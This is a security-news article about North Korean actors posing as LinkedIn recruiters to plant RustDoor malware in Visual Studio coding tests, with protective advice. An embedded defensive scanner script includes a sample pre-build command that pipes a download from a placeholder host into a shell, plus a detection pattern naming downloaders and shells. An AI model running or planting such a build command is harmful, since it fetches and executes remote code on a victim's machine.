Hackers Are Attacking Crypto And Finance Professionals On LinkedIn With Malware
Hackers are leveraging professional networks to target individuals in the cryptocurrency and financial sectors
Cybersecurity researchers are sounding the alarm over ongoing cyberattacks from North Korean threat actors using LinkedIn to deliver malware. These actors are leveraging professional networks to target individuals in the cryptocurrency and financial sectors, luring them with fake job offers and coding tests to infiltrate networks.
In a recent case identified by Jamf Threat Labs, a user was contacted by a fake recruiter from a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi. This is part of a broader campaign by North Korea to infiltrate targeted organizations by posing as recruiters or interviewers. The malware being delivered in these attacks is called RustDoor, also known as Thiefbucket, and it represents a significant risk to businesses and individuals in the cryptocurrency sector.
Let’s break down this attack, who is at risk, and how to protect yourself.
Understanding the Vulnerability
The RustDoor malware campaign begins with highly tailored social engineering tactics, where cybercriminals impersonate recruiters and attempt to build trust with their targets. Once trust is established, they ask the victim to perform a task such as executing a coding test or downloading files, often packaged in legitimate-looking Visual Studio projects. However, hidden within these files are malicious scripts that download and install malware onto the victim's machine.
In the case uncovered by Jamf Threat Labs, victims were asked to download a Visual Studio project that contained embedded commands designed to execute malicious payloads. These payloads—VisualStudioHelper and zsh_env—act as backdoors that give attackers ongoing access to the victim's machine. RustDoor is particularly dangerous because it allows attackers to steal sensitive information, gain unauthorized access, and persist within the system without being easily detected.
The malware targets macOS systems, but previous campaigns have also targeted Windows machines using similar strategies. The malware can stay hidden by embedding itself into legitimate system processes, making it harder for standard antivirus software to detect it.
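The embedded-command mechanism described above can be checked for before a project is ever built. As an added example (not code from the article or from Jamf's report), this Python script parses an MSBuild project file (.vcxproj or .csproj), lists every pre/post-build event and Exec task, and flags any that invoke a shell, interpreter or downloader; the sample project and its URL are constructed placeholders, and the assumption that the embedded commands live in build events is mine.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample .vcxproj: a pre-build event piping a download into a shell,
# plus an Exec task after build. The URL and commands are placeholders, not
# indicators from any report.
SAMPLE_VCXPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>curl -s https://example.invalid/stage | sh</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="AfterBuild">
    <Exec Command="python3 setup_env.py" />
  </Target>
</Project>
"""

# MSBuild elements whose <Command> child runs during a build (assumed list).
EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "CustomBuildStep"}
# Interpreters and downloaders a coding test has no reason to call at build time.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|sh|bash|zsh|python3?|node|powershell|base64|osascript)\b", re.I)

def _local(tag):
    # Strip the MSBuild XML namespace prefix "{...}" from an element tag.
    return tag.rsplit("}", 1)[-1]

def find_build_commands(project_xml):
    """Return (location, command) pairs for every command MSBuild would run on build."""
    root = ET.fromstring(project_xml)
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_TAGS:
            for child in elem:
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    found.append((name, child.text.strip()))
        elif name == "Exec" and elem.get("Command"):
            found.append(("Exec", elem.get("Command").strip()))
    return found

def flag_project(project_xml):
    """Return only the build commands that call a shell, interpreter or downloader."""
    return [(loc, cmd) for loc, cmd in find_build_commands(project_xml) if SUSPICIOUS.search(cmd)]

if __name__ == "__main__":
    for loc, cmd in flag_project(SAMPLE_VCXPROJ):
        print(f"[{loc}] {cmd}")
```

Run it against any project a recruiter sends before opening it in Visual Studio; an empty result does not prove the project is safe, but a flagged pre-build event is reason enough to stop.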
Who Is at Risk?
The primary targets of this campaign are individuals and companies within the cryptocurrency and decentralized finance (DeFi) sectors. North Korean cybercriminals have been known to focus on financial and crypto organizations due to their ability to generate significant illicit revenue.
People who are active on LinkedIn and other professional social networks are particularly vulnerable, as these platforms are being used to create fake recruiting profiles that appear highly credible. Professionals working in financial institutions, cryptocurrency exchanges, payment processing firms, and even government agencies may be approached by these fake recruiters.
Developers, in particular, are at high risk. The attack often involves asking the target to run Node.js or Python scripts or to clone GitHub repositories, which are common tasks for software engineers. Additionally, the use of Telegram channels for communication, as seen in other attacks, may further expose individuals to these risks.
How to Protect Yourself
Given the sophisticated nature of these attacks, it's crucial to take proactive steps to protect yourself and your organization. Here’s how:
1. Verify Recruiter Identities
If you’re contacted by someone on LinkedIn claiming to be a recruiter, especially from a cryptocurrency or finance firm, take steps to verify their identity. Reach out to the company they claim to represent directly, using contact information from their official website, rather than replying to their messages on LinkedIn.
2. Be Cautious with File Downloads
Never download or execute files, including coding tests or projects, unless you are certain they are from a trusted source. Cybercriminals often disguise malware as legitimate files, so always double-check before downloading.
3. Limit Personal Information on Professional Networks
Avoid sharing too much information on professional networks like LinkedIn. Threat actors may use details from your profile to craft convincing phishing attempts, including using knowledge of your current job or interests to lure you into their trap.
4. Use Endpoint Security Solutions
Ensure your computer is protected by up-to-date antivirus and endpoint protection software. These tools can help detect and block malware like RustDoor before it has a chance to compromise your system.
5. Enable Multi-Factor Authentication (MFA)
Adding an extra layer of security with multi-factor authentication can help protect your accounts and reduce the risk of unauthorized access, even if your credentials are compromised.
6. Educate Your Employees
If you manage a team or organization, especially in the cryptocurrency or finance sectors, educate your employees about the risks of social engineering and phishing attacks. Regular training on how to identify suspicious communications and avoid downloading unverified files is key to preventing these types of breaches.
7. Monitor for Unusual Activity
Stay vigilant for signs of unusual behavior on your devices, such as unexpected system performance issues, unfamiliar processes running in the background, or unprompted requests for your system password.
Conclusion
North Korean threat actors are becoming increasingly bold in their efforts to target individuals and companies in the cryptocurrency and financial sectors. The use of LinkedIn as a platform to initiate these attacks is a reminder of how social engineering tactics can be used to gain unauthorized access to systems and data.
By staying vigilant, verifying contacts, and implementing robust security measures, individuals and organizations can protect themselves against this growing threat. As attackers continue to evolve their strategies, it’s more important than ever to remain cautious and proactive in safeguarding your systems from malware like RustDoor.